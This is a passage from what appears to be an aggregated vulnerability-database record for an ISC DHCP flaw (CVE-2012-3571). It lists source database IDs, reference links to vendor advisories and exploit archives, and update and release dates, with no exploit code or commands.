db: | CERT/CC | id: | VU#107886 | Trust: 0.3 |
db: | BID | id: | 47176 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2012-3571 | Trust: 2.1 |
url: | https://www.securityfocus.com/bid/54665/info | Trust: 1.0 |
url: | http://www.isc.org/software/dhcp | Trust: 0.6 |
url: | https://kb.juniper.net/infocenter/index?page=content&id=jsa10761&cat=sirt_1&actp=list | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/37538/ | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/37538 | Trust: 0.3 |
url: | http://www.cert.fi/en/reports/2012/vulnerability636698.html | Trust: 0.3 |
url: | https://www.isc.org/software/dhcp/advisories/cve-2012-3571 | Trust: 0.3 |
url: | https://downloads.avaya.com/css/p8/documents/100166045 | Trust: 0.3 |
url: | https://www.isc.org/software/dhcp/advisories/cve-2012-3570 | Trust: 0.3 |
url: | https://www.isc.org/software/dhcp/advisories/cve-2012-3954 | Trust: 0.3 |
url: | http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html | Trust: 0.3 |
url: | http://lists.vmware.com/pipermail/security-announce/2011/000142.html | Trust: 0.3 |
url: | http://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2011-005.txt.asc | Trust: 0.3 |
url: | http://www.kb.cert.org/vuls/id/107886 | Trust: 0.3 |
url: | http://lists.apple.com/archives/security-announce/2011/nov/msg00002.html | Trust: 0.3 |
url: | http://support.citrix.com/article/ctx130325 | Trust: 0.3 |
url: | https://www.isc.org/software/dhcp/advisories/cve-2011-0997 | Trust: 0.3 |
url: | http://support.avaya.com/css/p8/documents/100143367 | Trust: 0.3 |
SOURCES
db: | BID | id: | 54665 |
db: | BID | id: | 47176 |
db: | PACKETSTORM | id: | 115094 |
db: | EXPLOIT-DB | id: | 37538 |
db: | EDBNET | id: | 58746 |
LAST UPDATE DATE
2022-07-27T09:59:09.687000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 54665 | date: | 2016-10-26T04:08:00 |
db: | BID | id: | 47176 | date: | 2016-10-26T09:06:00 |
SOURCES RELEASE DATE
db: | BID | id: | 54665 | date: | 2012-07-25T00:00:00 |
db: | BID | id: | 47176 | date: | 2011-04-05T00:00:00 |
db: | PACKETSTORM | id: | 115094 | date: | 2012-07-29T12:12:12 |
db: | EXPLOIT-DB | id: | 37538 | date: | 2012-07-25T00:00:00 |
db: | EDBNET | id: | 58746 | date: | 2012-07-25T00:00:00 |